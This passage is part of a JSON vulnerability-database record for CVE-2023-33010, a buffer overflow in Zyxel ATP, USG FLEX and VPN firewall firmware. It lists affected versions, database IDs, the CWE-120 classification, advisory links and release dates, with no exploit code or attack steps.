        "data": "A buffer overflow vulnerability in the ID processing function in Zyxel ATP series firmware versions 4.32 through 5.36 Patch 1, USG FLEX series firmware versions 4.50 through 5.36 Patch 1, USG FLEX 50(W) firmware versions 4.25 through 5.36 Patch 1, USG20(W)-VPN firmware versions 4.25 through 5.36 Patch 1, VPN series firmware versions 4.30 through 5.36 Patch 1, ZyWALL/USG series firmware versions 4.25 through 4.73 Patch 1, could allow an unauthenticated attacker to cause denial-of-service (DoS) conditions and even a remote code execution on an affected device. ATP100 firmware, ATP200 firmware, ATP500 firmware etc. ZyXEL The product contains a classic buffer overflow vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-33010"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-007634"
          },
          {
            "db": "VULMON",
            "id": "CVE-2023-33010"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2023-33010",
            "trust": 3.3
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-007634",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202305-2093",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2023-33010",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-33010"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-007634"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-33010"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202305-2093"
          }
        ]
      },
      "id": "VAR-202305-2285",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.3125
      },
      "last_update_date": "2023-12-18T11:54:13.182000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Zyxel ATP Security vulnerabilities",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=240581"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202305-2093"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-120",
            "trust": 1.0
          },
          {
            "problemtype": "Classic buffer overflow (CWE-120) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-007634"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-33010"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-multiple-buffer-overflow-vulnerabilities-of-firewalls"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2023-33010"
          },
          {
            "trust": 0.8,
            "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2023-33010/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2023-33010"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-007634"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-33010"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202305-2093"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2023-33010"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-007634"
          },
          {
            "db": "NVD",
            "id": "CVE-2023-33010"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202305-2093"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-05-24T00:00:00",
            "db": "VULMON",
            "id": "CVE-2023-33010"
          },
          {
            "date": "2023-11-24T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-007634"
          },
          {
            "date": "2023-05-24T13:15:09.640000",
            "db": "NVD",
            "id": "CVE-2023-33010"
          },
          {
            "date": "2023-05-24T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202305-2093"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-05-24T00:00:00",
            "db": "VULMON",
            "id": "CVE-2023-33010"
          },
          {
            "date": "2023-11-24T08:10:00",
            "db": "JVNDB",
            "id": "JVNDB-2023-007634"
          },
          {
            "date": "2023-06-07T18:20:46.193000",
            "db": "NVD",
            "id": "CVE-2023-33010"
          },
          {
            "date": "2023-06-07T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202305-2093"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202305-2093"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0ZyXEL\u00a0 Classic buffer overflow vulnerability in the product",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2023-007634"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202305-2093"
          }
        ],
        "trust": 0.6
      }
    }